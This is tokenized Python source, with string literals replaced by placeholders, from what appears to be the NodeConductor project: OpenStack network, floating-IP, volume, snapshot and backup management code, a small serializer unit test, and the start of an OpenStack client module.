[ '<STR_LIT>' ] <EOL> if bool ( routers ) : <EOL> router = routers [ <NUM_LIT:0> ] <EOL> else : <EOL> logger . warning ( '<STR_LIT>' , membership ) <EOL> return <EOL> ext_gw = router . get ( '<STR_LIT>' , { } ) <EOL> if '<STR_LIT>' in ext_gw : <EOL> membership . external_network_id = ext_gw [ '<STR_LIT>' ] <EOL> membership . save ( ) <EOL> logger . info ( '<STR_LIT>' , ext_gw [ '<STR_LIT>' ] ) <EOL> def delete_external_network ( self , membership , neutron ) : <EOL> floating_ips = neutron . list_floatingips ( floating_network_id = membership . external_network_id ) [ '<STR_LIT>' ] <EOL> for ip in floating_ips : <EOL> neutron . delete_floatingip ( ip [ '<STR_LIT:id>' ] ) <EOL> logger . info ( '<STR_LIT>' , ip [ '<STR_LIT:id>' ] ) <EOL> ports = neutron . list_ports ( network_id = membership . external_network_id ) [ '<STR_LIT>' ] <EOL> for port in ports : <EOL> neutron . remove_interface_router ( port [ '<STR_LIT>' ] , { '<STR_LIT>' : port [ '<STR_LIT:id>' ] } ) <EOL> logger . info ( '<STR_LIT>' , port [ '<STR_LIT:id>' ] ) <EOL> subnets = neutron . list_subnets ( network_id = membership . external_network_id ) [ '<STR_LIT>' ] <EOL> for subnet in subnets : <EOL> neutron . delete_subnet ( subnet [ '<STR_LIT:id>' ] ) <EOL> logger . info ( '<STR_LIT>' , subnet [ '<STR_LIT:id>' ] ) <EOL> neutron . delete_network ( membership . external_network_id ) <EOL> logger . info ( '<STR_LIT>' , membership . external_network_id ) <EOL> membership . external_network_id = '<STR_LIT>' <EOL> membership . save ( ) <EOL> def get_or_create_router ( self , neutron , network_name , subnet_id , tenant_id , external = False , network_id = None ) : <EOL> router_name = '<STR_LIT>' . format ( network_name ) <EOL> routers = neutron . list_routers ( tenant_id = tenant_id ) [ '<STR_LIT>' ] <EOL> if routers : <EOL> logger . info ( '<STR_LIT>' , tenant_id ) <EOL> router = routers [ <NUM_LIT:0> ] <EOL> else : <EOL> router = neutron . create_router ( { '<STR_LIT>' : { '<STR_LIT:name>' : router_name , '<STR_LIT>' : tenant_id } } ) [ '<STR_LIT>' ] <EOL> logger . info ( '<STR_LIT>' , router [ '<STR_LIT:name>' ] ) <EOL> try : <EOL> if not external : <EOL> ports = neutron . list_ports ( device_id = router [ '<STR_LIT:id>' ] , tenant_id = tenant_id ) [ '<STR_LIT>' ] <EOL> if not ports : <EOL> neutron . add_interface_router ( router [ '<STR_LIT:id>' ] , { '<STR_LIT>' : subnet_id } ) <EOL> logger . info ( '<STR_LIT>' , subnet_id , router_name ) <EOL> else : <EOL> logger . info ( '<STR_LIT>' , subnet_id , router_name ) <EOL> else : <EOL> if ( not router . get ( '<STR_LIT>' ) or <EOL> router [ '<STR_LIT>' ] . get ( '<STR_LIT>' ) != network_id ) : <EOL> neutron . add_gateway_router ( router [ '<STR_LIT:id>' ] , { '<STR_LIT>' : network_id } ) <EOL> logger . info ( '<STR_LIT>' , network_id , router_name ) <EOL> else : <EOL> logger . info ( '<STR_LIT>' , network_id , router_name ) <EOL> except neutron_exceptions . NeutronClientException as e : <EOL> logger . warning ( e ) <EOL> return router [ '<STR_LIT:id>' ] <EOL> def get_hypervisors_statistics ( self , nova ) : <EOL> return nova . hypervisors . statistics ( ) . _info <EOL> def get_key_name ( self , public_key ) : <EOL> safe_name = self . sanitize_key_name ( public_key . name ) <EOL> key_name = '<STR_LIT>' . format ( public_key . uuid . hex , safe_name ) <EOL> return key_name <EOL> def sanitize_key_name ( self , key_name ) : <EOL> return re . sub ( r'<STR_LIT>' , '<STR_LIT:_>' , key_name ) [ : <NUM_LIT> ] <EOL> def _get_project_ascii_name ( self , project ) : <EOL> return '<STR_LIT>' . join ( [ c for c in project . name if ord ( c ) < <NUM_LIT> ] ) <EOL> def get_tenant_name ( self , membership ) : <EOL> return '<STR_LIT>' % { <EOL> '<STR_LIT>' : self . _get_project_ascii_name ( membership . project ) [ : <NUM_LIT:15> ] , <EOL> '<STR_LIT>' : membership . project . uuid . hex [ : <NUM_LIT:4> ] <EOL> } <EOL> def get_tenant_internal_network_name ( self , membership ) : <EOL> tenant_name = self . get_tenant_name ( membership ) <EOL> return '<STR_LIT>' . format ( tenant_name ) <EOL> def create_backend_name ( self ) : <EOL> return '<STR_LIT>' . format ( uuid . uuid4 ( ) . hex ) <EOL> def _wait_for_instance_status ( self , server_id , nova , complete_status , <EOL> error_status = None , retries = <NUM_LIT> , poll_interval = <NUM_LIT:3> ) : <EOL> return self . _wait_for_object_status ( <EOL> server_id , nova . servers . get , complete_status , error_status , retries , poll_interval ) <EOL> def _wait_for_volume_status ( self , volume_id , cinder , complete_status , <EOL> error_status = None , retries = <NUM_LIT> , poll_interval = <NUM_LIT:3> ) : <EOL> return self . _wait_for_object_status ( <EOL> volume_id , cinder . volumes . get , complete_status , error_status , retries , poll_interval ) <EOL> def _wait_for_snapshot_status ( self , snapshot_id , cinder , complete_status , error_status , retries = <NUM_LIT> , poll_interval = <NUM_LIT:3> ) : <EOL> return self . _wait_for_object_status ( <EOL> snapshot_id , cinder . volume_snapshots . get , complete_status , error_status , retries , poll_interval ) <EOL> def _wait_for_backup_status ( self , backup , cinder , complete_status , error_status , retries = <NUM_LIT> , poll_interval = <NUM_LIT:3> ) : <EOL> return self . _wait_for_object_status ( <EOL> backup , cinder . backups . get , complete_status , error_status , retries , poll_interval ) <EOL> def _wait_for_object_status ( self , obj_id , client_get_method , complete_status , error_status = None , <EOL> retries = <NUM_LIT:30> , poll_interval = <NUM_LIT:3> ) : <EOL> complete_state_predicate = lambda o : o . status == complete_status <EOL> if error_status is not None : <EOL> error_state_predicate = lambda o : o . status == error_status <EOL> else : <EOL> error_state_predicate = lambda _ : False <EOL> for _ in range ( retries ) : <EOL> obj = client_get_method ( obj_id ) <EOL> if complete_state_predicate ( obj ) : <EOL> return True <EOL> if error_state_predicate ( obj ) : <EOL> return False <EOL> time . sleep ( poll_interval ) <EOL> else : <EOL> return False <EOL> def _wait_for_volume_deletion ( self , volume_id , cinder , retries = <NUM_LIT> , poll_interval = <NUM_LIT:3> ) : <EOL> try : <EOL> for _ in range ( retries ) : <EOL> cinder . volumes . get ( volume_id ) <EOL> time . sleep ( poll_interval ) <EOL> return False <EOL> except cinder_exceptions . NotFound : <EOL> return True <EOL> def _wait_for_snapshot_deletion ( self , snapshot_id , cinder , retries = <NUM_LIT> , poll_interval = <NUM_LIT:3> ) : <EOL> try : <EOL> for _ in range ( retries ) : <EOL> cinder . volume_snapshots . get ( snapshot_id ) <EOL> time . sleep ( poll_interval ) <EOL> return False <EOL> except ( cinder_exceptions . NotFound , keystone_exceptions . NotFound ) : <EOL> return True <EOL> def _wait_for_instance_deletion ( self , backend_instance_id , nova , retries = <NUM_LIT> , poll_interval = <NUM_LIT:3> ) : <EOL> try : <EOL> for _ in range ( retries ) : <EOL> nova . servers . get ( backend_instance_id ) <EOL> time . sleep ( poll_interval ) <EOL> return False <EOL> except nova_exceptions . NotFound : <EOL> return True <EOL> def _attach_volume ( self , nova , cinder , server_id , volume_id , instance_uuid ) : <EOL> nova . volumes . create_server_volume ( server_id , volume_id , None ) <EOL> if not self . _wait_for_volume_status ( volume_id , cinder , '<STR_LIT>' , '<STR_LIT:error>' ) : <EOL> logger . error ( <EOL> '<STR_LIT>' , <EOL> volume_id , instance_uuid , <EOL> ) <EOL> raise CloudBackendError ( <EOL> '<STR_LIT>' <EOL> % ( volume_id , instance_uuid ) <EOL> ) <EOL> def _detach_volume ( self , nova , cinder , server_id , volume_id , instance_uuid ) : <EOL> nova . volumes . delete_server_volume ( server_id , volume_id ) <EOL> if not self . _wait_for_volume_status ( volume_id , cinder , '<STR_LIT>' , '<STR_LIT:error>' ) : <EOL> logger . error ( <EOL> '<STR_LIT>' , <EOL> volume_id , instance_uuid , <EOL> ) <EOL> raise CloudBackendError ( <EOL> '<STR_LIT>' <EOL> % ( volume_id , instance_uuid ) <EOL> ) <EOL> def _extend_volume ( self , cinder , volume , new_backend_size ) : <EOL> cinder . volumes . extend ( volume , new_backend_size ) <EOL> if not self . _wait_for_volume_status ( volume . id , cinder , '<STR_LIT>' , '<STR_LIT:error>' ) : <EOL> logger . error ( <EOL> '<STR_LIT>' , <EOL> volume . id , <EOL> ) <EOL> raise CloudBackendError ( <EOL> '<STR_LIT>' <EOL> % volume . id , <EOL> ) <EOL> def push_floating_ip_to_instance ( self , server , instance , nova ) : <EOL> if not instance . external_ips or not instance . internal_ips : <EOL> return <EOL> logger . debug ( '<STR_LIT>' , <EOL> instance . external_ips , instance . uuid ) <EOL> membership = instance . cloud_project_membership <EOL> try : <EOL> floating_ip = membership . floating_ips . get ( <EOL> status__in = ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> address = instance . external_ips , <EOL> backend_network_id = membership . external_network_id <EOL> ) <EOL> server . add_floating_ip ( address = instance . external_ips , fixed_address = instance . internal_ips ) <EOL> except ( <EOL> nova_exceptions . ClientException , <EOL> ObjectDoesNotExist , <EOL> MultipleObjectsReturned , <EOL> KeyError , <EOL> IndexError , <EOL> ) : <EOL> logger . exception ( '<STR_LIT>' , <EOL> instance . external_ips , instance . uuid ) <EOL> instance . set_erred ( ) <EOL> instance . save ( ) <EOL> else : <EOL> floating_ip . status = '<STR_LIT>' <EOL> floating_ip . save ( ) <EOL> logger . info ( '<STR_LIT>' , <EOL> instance . external_ips , instance . uuid ) <EOL> def release_floating_ip_from_instance ( self , instance ) : <EOL> if not instance . external_ips : <EOL> return <EOL> membership = instance . cloud_project_membership <EOL> try : <EOL> floating_ip = membership . floating_ips . get ( <EOL> status = '<STR_LIT>' , <EOL> address = instance . external_ips , <EOL> backend_network_id = membership . external_network_id <EOL> ) <EOL> except ( ObjectDoesNotExist , MultipleObjectsReturned ) : <EOL> logger . warning ( '<STR_LIT>' , <EOL> instance . external_ips , instance . uuid ) <EOL> else : <EOL> floating_ip . status = '<STR_LIT>' <EOL> floating_ip . save ( ) <EOL> logger . info ( '<STR_LIT>' , <EOL> instance . external_ips , instance . uuid ) <EOL> def allocate_floating_ip_address ( self , neutron , membership ) : <EOL> try : <EOL> data = { '<STR_LIT>' : membership . external_network_id , '<STR_LIT>' : membership . tenant_id } <EOL> ip_address = neutron . create_floatingip ( { '<STR_LIT>' : data } ) [ '<STR_LIT>' ] <EOL> except neutron_exceptions . NeutronClientException as e : <EOL> logger . exception ( '<STR_LIT>' , <EOL> membership . external_network_id ) <EOL> six . reraise ( CloudBackendError , e ) <EOL> else : <EOL> membership . floating_ips . create ( <EOL> status = '<STR_LIT>' , <EOL> address = ip_address [ '<STR_LIT>' ] , <EOL> backend_id = ip_address [ '<STR_LIT:id>' ] , <EOL> backend_network_id = ip_address [ '<STR_LIT>' ] <EOL> ) <EOL> logger . info ( '<STR_LIT>' , <EOL> ip_address [ '<STR_LIT>' ] , membership . external_network_id ) <EOL> def assign_floating_ip_to_instance ( self , nova , instance , floating_ip ) : <EOL> nova . servers . add_floating_ip ( server = instance . backend_id , address = floating_ip . address ) <EOL> floating_ip . status = '<STR_LIT>' <EOL> floating_ip . save ( ) <EOL> instance . external_ips = floating_ip . address <EOL> instance . save ( ) <EOL> logger . info ( '<STR_LIT>' , <EOL> floating_ip . address , instance . uuid ) <EOL> def get_attached_volumes ( self , server_id , nova ) : <EOL> """<STR_LIT>""" <EOL> return nova . volumes . get_server_volumes ( server_id ) <EOL> def create_snapshot ( self , volume_id , cinder ) : <EOL> """<STR_LIT>""" <EOL> snapshot = cinder . volume_snapshots . create ( <EOL> volume_id , force = True , display_name = '<STR_LIT>' % volume_id ) <EOL> logger . debug ( '<STR_LIT>' % snapshot . id ) <EOL> if not self . _wait_for_snapshot_status ( snapshot . id , cinder , '<STR_LIT>' , '<STR_LIT:error>' ) : <EOL> logger . error ( '<STR_LIT>' , volume_id ) <EOL> raise CloudBackendInternalError ( ) <EOL> logger . info ( '<STR_LIT>' , snapshot . id , volume_id ) <EOL> return snapshot <EOL> def delete_snapshot ( self , snapshot_id , cinder ) : <EOL> """<STR_LIT>""" <EOL> logger . debug ( '<STR_LIT>' , snapshot_id ) <EOL> if not self . _wait_for_snapshot_status ( snapshot_id , cinder , '<STR_LIT>' , '<STR_LIT:error>' , poll_interval = <NUM_LIT> , retries = <NUM_LIT:30> ) : <EOL> logger . exception ( '<STR_LIT>' , snapshot_id ) <EOL> raise CloudBackendInternalError ( ) <EOL> cinder . volume_snapshots . delete ( snapshot_id ) <EOL> logger . info ( '<STR_LIT>' , snapshot_id ) <EOL> def create_volume_from_snapshot ( self , snapshot_id , cinder , prefix = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> snapshot = cinder . volume_snapshots . get ( snapshot_id ) <EOL> volume_size = snapshot . size <EOL> volume_name = prefix + ( '<STR_LIT>' % snapshot . volume_id ) <EOL> logger . debug ( '<STR_LIT>' , snapshot_id ) <EOL> created_volume = cinder . volumes . create ( volume_size , snapshot_id = snapshot_id , <EOL> display_name = volume_name ) <EOL> volume_id = created_volume . id <EOL> if not self . _wait_for_volume_status ( volume_id , cinder , '<STR_LIT>' , '<STR_LIT:error>' ) : <EOL> logger . error ( '<STR_LIT>' , snapshot_id ) <EOL> raise CloudBackendInternalError ( ) <EOL> logger . info ( '<STR_LIT>' , <EOL> volume_id , snapshot_id ) <EOL> return volume_id <EOL> def delete_volume ( self , volume_id , cinder ) : <EOL> """<STR_LIT>""" <EOL> logger . debug ( '<STR_LIT>' % volume_id ) <EOL> if not self . _wait_for_volume_status ( volume_id , cinder , '<STR_LIT>' , '<STR_LIT:error>' , poll_interval = <NUM_LIT:20> ) : <EOL> logger . exception ( '<STR_LIT>' , volume_id ) <EOL> raise CloudBackendInternalError ( ) <EOL> cinder . volumes . delete ( volume_id ) <EOL> logger . info ( '<STR_LIT>' ) <EOL> def get_backup_info ( self , backup_id , cinder ) : <EOL> """<STR_LIT>""" <EOL> backup_info = cinder . backups . get ( backup_id ) <EOL> return { <EOL> '<STR_LIT:name>' : backup_info . name , <EOL> '<STR_LIT:status>' : backup_info . status , <EOL> '<STR_LIT:description>' : backup_info . description <EOL> } <EOL> def create_volume_backup ( self , volume_id , bckp_desc , cinder ) : <EOL> """<STR_LIT>""" <EOL> backup_name = '<STR_LIT>' % volume_id <EOL> logger . debug ( '<STR_LIT>' % volume_id ) <EOL> if not self . _wait_for_volume_status ( volume_id , cinder , '<STR_LIT>' , '<STR_LIT:error>' ) : <EOL> logger . exception ( '<STR_LIT>' , volume_id ) <EOL> raise CloudBackendInternalError ( ) <EOL> backup_volume = cinder . backups . create ( volume_id , name = backup_name , description = bckp_desc ) <EOL> logger . info ( '<STR_LIT>' , volume_id ) <EOL> return backup_volume . id <EOL> def restore_volume_backup ( self , backup_id , cinder ) : <EOL> """<STR_LIT>""" <EOL> logger . debug ( '<STR_LIT>' , backup_id ) <EOL> if not self . _wait_for_backup_status ( backup_id , cinder , '<STR_LIT>' , '<STR_LIT:error>' ) : <EOL> logger . exception ( '<STR_LIT>' , backup_id ) <EOL> raise CloudBackendInternalError ( ) <EOL> restore = cinder . restores . restore ( backup_id ) <EOL> logger . debug ( '<STR_LIT>' , backup_id ) <EOL> volume_id = restore . volume_id <EOL> if not self . _wait_for_volume_status ( volume_id , cinder , '<STR_LIT>' , '<STR_LIT>' , poll_interval = <NUM_LIT:20> ) : <EOL> logger . exception ( '<STR_LIT>' , backup_id ) <EOL> raise CloudBackendInternalError ( ) <EOL> logger . info ( '<STR_LIT>' , volume_id ) <EOL> logger . info ( '<STR_LIT>' , backup_id ) <EOL> return volume_id <EOL> def delete_backup ( self , backup_id , cinder ) : <EOL> """<STR_LIT>""" <EOL> backup = cinder . backups . get ( backup_id ) <EOL> logger . debug ( '<STR_LIT>' , backup_id ) <EOL> if not self . _wait_for_backup_status ( backup_id , cinder , '<STR_LIT>' , '<STR_LIT:error>' ) : <EOL> logger . exception ( '<STR_LIT>' , backup_id , backup . status ) <EOL> raise CloudBackendInternalError ( ) <EOL> else : <EOL> cinder . backups . delete ( backup_id ) <EOL> logger . info ( '<STR_LIT>' , backup_id ) <EOL> def create_vm ( self , server_id , device_map , nova ) : <EOL> """<STR_LIT>""" <EOL> server = nova . servers . get ( server_id ) <EOL> new_server_name = '<STR_LIT>' % server . name <EOL> flavor = nova . flavors . get ( server . flavor . get ( '<STR_LIT:id>' ) ) <EOL> new_server = nova . servers . create ( new_server_name , None , flavor , block_device_mapping = device_map ) <EOL> logger . debug ( '<STR_LIT>' , new_server . id ) <EOL> while new_server . status == '<STR_LIT>' : <EOL> time . sleep ( <NUM_LIT:5> ) <EOL> new_server = nova . servers . get ( new_server . id ) <EOL> logger . info ( '<STR_LIT>' , new_server . id ) <EOL> return new_server . id <EOL> def _are_rules_equal ( self , backend_rule , nc_rule ) : <EOL> """<STR_LIT>""" <EOL> if backend_rule [ '<STR_LIT>' ] != nc_rule . from_port : <EOL> return False <EOL> if backend_rule [ '<STR_LIT>' ] != nc_rule . to_port : <EOL> return False <EOL> if backend_rule [ '<STR_LIT>' ] != nc_rule . protocol : <EOL> return False <EOL> if backend_rule [ '<STR_LIT>' ] . get ( '<STR_LIT>' , '<STR_LIT>' ) != nc_rule . cidr : <EOL> return False <EOL> return True <EOL> def _are_security_groups_equal ( self , backend_security_group , nc_security_group ) : <EOL> if backend_security_group . name != nc_security_group . name : <EOL> return False <EOL> if len ( backend_security_group . rules ) != nc_security_group . rules . count ( ) : <EOL> return False <EOL> for backend_rule , nc_rule in zip ( backend_security_group . rules , nc_security_group . rules . all ( ) ) : <EOL> if not self . _are_rules_equal ( backend_rule , nc_rule ) : <EOL> return False <EOL> return True <EOL> def _get_instance_volumes ( self , nova , cinder , backend_instance_id ) : <EOL> try : <EOL> attached_volume_ids = [ <EOL> v . volumeId <EOL> for v in nova . volumes . get_server_volumes ( backend_instance_id ) <EOL> ] <EOL> if len ( attached_volume_ids ) != <NUM_LIT:2> : <EOL> logger . info ( '<STR_LIT>' , <EOL> backend_instance_id , len ( attached_volume_ids ) ) <EOL> raise LookupError <EOL> attached_volumes = [ <EOL> cinder . volumes . get ( volume_id ) <EOL> for volume_id in attached_volume_ids <EOL> ] <EOL> system_volume = next ( v for v in attached_volumes if v . bootable == '<STR_LIT:true>' ) <EOL> data_volume = next ( v for v in attached_volumes if v . bootable == '<STR_LIT:false>' ) <EOL> except ( cinder_exceptions . ClientException , StopIteration ) as e : <EOL> logger . info ( '<STR_LIT>' , backend_instance_id ) <EOL> six . reraise ( LookupError , e ) <EOL> else : <EOL> return system_volume , data_volume <EOL> def _get_instance_template ( self , system_volume , membership , backend_instance_id ) : <EOL> try : <EOL> image_id = system_volume . volume_image_metadata [ '<STR_LIT>' ] <EOL> return models . Template . objects . get ( <EOL> images__backend_id = image_id , <EOL> images__cloud__cloudprojectmembership = membership , <EOL> ) <EOL> except ( KeyError , AttributeError ) : <EOL> logger . info ( '<STR_LIT>' , <EOL> backend_instance_id ) <EOL> raise LookupError <EOL> except ( models . Template . DoesNotExist , models . Template . MultipleObjectsReturned ) : <EOL> logger . info ( '<STR_LIT>' , <EOL> backend_instance_id ) <EOL> raise LookupError <EOL> def _get_flavor_info ( self , nova , backend_instance ) : <EOL> try : <EOL> flavor_id = backend_instance . flavor [ '<STR_LIT:id>' ] <EOL> flavor = nova . flavors . get ( flavor_id ) <EOL> except ( KeyError , AttributeError ) : <EOL> logger . info ( '<STR_LIT>' , <EOL> backend_instance . id ) <EOL> raise LookupError <EOL> except nova_exceptions . ClientException as e : <EOL> logger . info ( '<STR_LIT>' , <EOL> backend_instance . id ) <EOL> six . reraise ( LookupError , e ) <EOL> else : <EOL> cores = flavor . vcpus <EOL> ram = self . get_core_ram_size ( flavor . ram ) <EOL> return cores , ram , flavor . name <EOL> def _normalize_security_group_rule ( self , rule ) : <EOL> if rule [ '<STR_LIT>' ] is None : <EOL> rule [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> if '<STR_LIT>' not in rule [ '<STR_LIT>' ] : <EOL> rule [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> return rule <EOL> def _get_instance_state ( self , instance ) : <EOL> nova_to_nodeconductor = { <EOL> '<STR_LIT>' : models . Instance . States . ONLINE , <EOL> '<STR_LIT>' : models . Instance . States . PROVISIONING , <EOL> '<STR_LIT>' : models . Instance . States . ERRED , <EOL> '<STR_LIT>' : models . Instance . States . ERRED , <EOL> '<STR_LIT>' : models . Instance . States . STOPPING , <EOL> '<STR_LIT>' : models . Instance . States . STOPPING , <EOL> '<STR_LIT>' : models . Instance . States . STARTING , <EOL> '<STR_LIT>' : models . Instance . States . ONLINE , <EOL> '<STR_LIT>' : models . Instance . States . OFFLINE , <EOL> '<STR_LIT>' : models . Instance . States . ONLINE , <EOL> '<STR_LIT>' : models . Instance . States . OFFLINE , <EOL> '<STR_LIT>' : models . Instance . States . STOPPING , <EOL> '<STR_LIT>' : models . Instance . States . OFFLINE , <EOL> '<STR_LIT>' : models . Instance . States . OFFLINE , <EOL> '<STR_LIT>' : models . Instance . States . OFFLINE , <EOL> '<STR_LIT>' : models . Instance . States . ONLINE , <EOL> } <EOL> return nova_to_nodeconductor . get ( instance . status , <EOL> models . Instance . States . ERRED ) <EOL> def _get_instance_start_time ( self , instance ) : <EOL> try : <EOL> launch_time = instance . to_dict ( ) [ '<STR_LIT>' ] <EOL> d = dateparse . parse_datetime ( launch_time ) <EOL> except ( KeyError , ValueError ) : <EOL> return None <EOL> else : <EOL> if timezone . is_naive ( d ) : <EOL> d = timezone . make_aware ( d , timezone . utc ) <EOL> return d <EOL> def _get_instance_ips ( self , backend_instance ) : <EOL> extracted_ips = { } <EOL> for _ , net_conf in backend_instance . addresses . items ( ) : <EOL> for ip in net_conf : <EOL> if ip [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> extracted_ips [ '<STR_LIT>' ] = ip [ '<STR_LIT>' ] <EOL> continue <EOL> if ip [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> extracted_ips [ '<STR_LIT>' ] = ip [ '<STR_LIT>' ] <EOL> continue <EOL> return extracted_ips </s>
<s> import unittest <EOL> from nodeconductor . logging import serializers , loggers <EOL> class HookSerializerTest ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . events = loggers . get_valid_events ( ) [ : <NUM_LIT:3> ] <EOL> def test_valid_web_settings ( self ) : <EOL> serializer = serializers . WebHookSerializer ( data = { <EOL> '<STR_LIT>' : self . events , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } ) <EOL> self . assertTrue ( serializer . is_valid ( ) , serializer . errors ) <EOL> def test_valid_email_settings ( self ) : <EOL> serializer = serializers . EmailHookSerializer ( data = { <EOL> '<STR_LIT>' : self . events , <EOL> '<STR_LIT:email>' : '<STR_LIT>' <EOL> } ) <EOL> self . assertTrue ( serializer . is_valid ( ) ) <EOL> def test_invalid_web_settings ( self ) : <EOL> serializer = serializers . WebHookSerializer ( data = { <EOL> '<STR_LIT>' : self . events , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } ) <EOL> self . assertFalse ( serializer . is_valid ( ) ) <EOL> self . assertIn ( '<STR_LIT>' , serializer . errors ) <EOL> def test_invalid_events ( self ) : <EOL> serializer = serializers . WebHookSerializer ( data = { <EOL> '<STR_LIT>' : [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } ) <EOL> self . assertFalse ( serializer . is_valid ( ) ) <EOL> self . assertIn ( '<STR_LIT>' , serializer . errors ) </s>
<s> import datetime <EOL> import dateutil . parser <EOL> import logging <EOL> import re <EOL> import time <EOL> import uuid <EOL> from django . conf import settings as django_settings <EOL> from django . core . exceptions import ObjectDoesNotExist , MultipleObjectsReturned <EOL> from django . db import transaction <EOL> from django . utils import six , dateparse , timezone <EOL> from requests import ConnectionError <EOL> from keystoneclient . auth . identity import v2 <EOL> from keystoneclient . service_catalog import ServiceCatalog <EOL> from keystoneclient import session as keystone_session <EOL> from ceilometerclient import client as ceilometer_client <EOL> from cinderclient . v1 import client as cinder_client <EOL> from glanceclient . v1 import client as glance_client <EOL> from keystoneclient . v2_0 import client as keystone_client <EOL> from neutronclient . v2_0 import client as neutron_client <EOL> from novaclient . v1_1 import client as nova_client <EOL> from cinderclient import exceptions as cinder_exceptions <EOL> from glanceclient import exc as glance_exceptions <EOL> from keystoneclient import exceptions as keystone_exceptions <EOL> from neutronclient . client import exceptions as neutron_exceptions <EOL> from novaclient import exceptions as nova_exceptions <EOL> from nodeconductor . core . models import StateMixin <EOL> from nodeconductor . core . tasks import send_task <EOL> from nodeconductor . structure import ServiceBackend , ServiceBackendError , log_backend_action <EOL> from nodeconductor . structure . log import event_logger <EOL> from nodeconductor . openstack import models <EOL> logger = logging . getLogger ( __name__ ) <EOL> class OpenStackBackendError ( ServiceBackendError ) : <EOL> pass <EOL> class OpenStackSession ( dict ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , ks_session = None , verify_ssl = False , ** credentials ) : <EOL> self . keystone_session = ks_session <EOL> if not self . keystone_session : <EOL> auth_plugin = v2 . Password ( ** credentials ) <EOL> self . keystone_session = keystone_session . Session ( auth = auth_plugin , verify = verify_ssl ) <EOL> try : <EOL> self . keystone_session . get_token ( ) <EOL> except ( keystone_exceptions . AuthorizationFailure , keystone_exceptions . ConnectionRefused ) as e : <EOL> six . reraise ( OpenStackBackendError , e ) <EOL> for opt in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> self [ opt ] = getattr ( self . auth , opt ) <EOL> def __getattr__ ( self , name ) : <EOL> return getattr ( self . keystone_session , name ) <EOL> @ classmethod <EOL> def recover ( cls , session , verify_ssl = False ) : <EOL> if not isinstance ( session , dict ) or not session . get ( '<STR_LIT>' ) : <EOL> raise OpenStackBackendError ( '<STR_LIT>' ) <EOL> args = { '<STR_LIT>' : session [ '<STR_LIT>' ] , '<STR_LIT>' : session [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT:id>' ] } <EOL> if session [ '<STR_LIT>' ] : <EOL> args [ '<STR_LIT>' ] = session [ '<STR_LIT>' ] <EOL> elif session [ '<STR_LIT>' ] : <EOL> args [ '<STR_LIT>' ] = session [ '<STR_LIT>' ] <EOL> ks_session = keystone_session . Session ( auth = v2 . Token ( ** args ) , verify = verify_ssl ) <EOL> return cls ( <EOL> ks_session = ks_session , <EOL> tenant_id = session [ '<STR_LIT>' ] , <EOL> tenant_name = session [ '<STR_LIT>' ] ) <EOL> def validate ( self ) : <EOL> expiresat = dateutil . parser . parse ( self . auth . auth_ref [ '<STR_LIT>' ] [ '<STR_LIT>' ] ) <EOL> if expiresat > timezone . now ( ) + datetime . timedelta ( minutes = <NUM_LIT:10> ) : <EOL> return True <EOL> raise OpenStackBackendError ( '<STR_LIT>' ) <EOL> def __str__ ( self ) : <EOL> return str ( { k : v if k != '<STR_LIT:password>' else '<STR_LIT>' for k , v in self } ) <EOL> class OpenStackClient ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , session = None , verify_ssl = False , ** credentials ) : <EOL> self . verify_ssl = verify_ssl <EOL> if session : <EOL> if isinstance ( session , dict ) : <EOL> logger . info ( '<STR_LIT>' ) <EOL> self . session = OpenStackSession . recover ( session , verify_ssl = verify_ssl ) <EOL> self . session . validate ( ) <EOL> else : <EOL> self . session = session <EOL> else : <EOL> try : <EOL> self . session = OpenStackSession ( verify_ssl = verify_ssl , ** credentials ) <EOL> except AttributeError as e : <EOL> logger . error ( '<STR_LIT>' ) <EOL> six . reraise ( OpenStackBackendError , e ) <EOL> @ property <EOL> def keystone ( self ) : <EOL> return keystone_client . Client ( session = self . session . keystone_session ) <EOL> @ property <EOL> def nova ( self ) : <EOL> try : <EOL> return nova_client . Client ( session = self . session . keystone_session ) <EOL> except ( nova_exceptions . ClientException , keystone_exceptions . ClientException ) as e : <EOL> logger . exception ( '<STR_LIT>' , e ) <EOL> six . reraise ( OpenStackBackendError , e ) <EOL> @ property <EOL> def neutron ( self ) : <EOL> try : <EOL> return neutron_client . Client ( session = self . session . keystone_session ) <EOL> except ( neutron_exceptions . NeutronClientException , keystone_exceptions . ClientException ) as e : <EOL> logger . exception ( '<STR_LIT>' , e ) <EOL> six . reraise ( OpenStackBackendError , e ) <EOL> @ property <EOL> def cinder ( self ) : <EOL> try : <EOL> return cinder_client . Client ( session = self . session . keystone_session ) <EOL> except ( cinder_exceptions . ClientException , keystone_exceptions . ClientException ) as e : <EOL> logger . exception ( '<STR_LIT>' , e ) <EOL> six . reraise ( OpenStackBackendError , e ) <EOL> @ property <EOL> def glance ( self ) : <EOL> catalog = ServiceCatalog . factory ( self . session . auth . auth_ref ) <EOL> endpoint = catalog . url_for ( service_type = '<STR_LIT:image>' ) <EOL> kwargs = { <EOL> '<STR_LIT>' : self . session . get_token ( ) , <EOL> '<STR_LIT>' : not self . verify_ssl , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : True , <EOL> } <EOL> return glance_client . Client ( endpoint , ** kwargs ) <EOL> @ property <EOL> def ceilometer ( self ) : <EOL> catalog = ServiceCatalog . factory ( self . session . auth . auth_ref ) <EOL> endpoint = catalog . url_for ( service_type = '<STR_LIT>' ) <EOL> kwargs = { <EOL> '<STR_LIT>' : lambda : self . session . get_token ( ) , <EOL> '<STR_LIT>' : endpoint , <EOL> '<STR_LIT>' : not self . verify_ssl , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : True , <EOL> } <EOL> return ceilometer_client . Client ( '<STR_LIT:2>' , ** kwargs ) <EOL> class 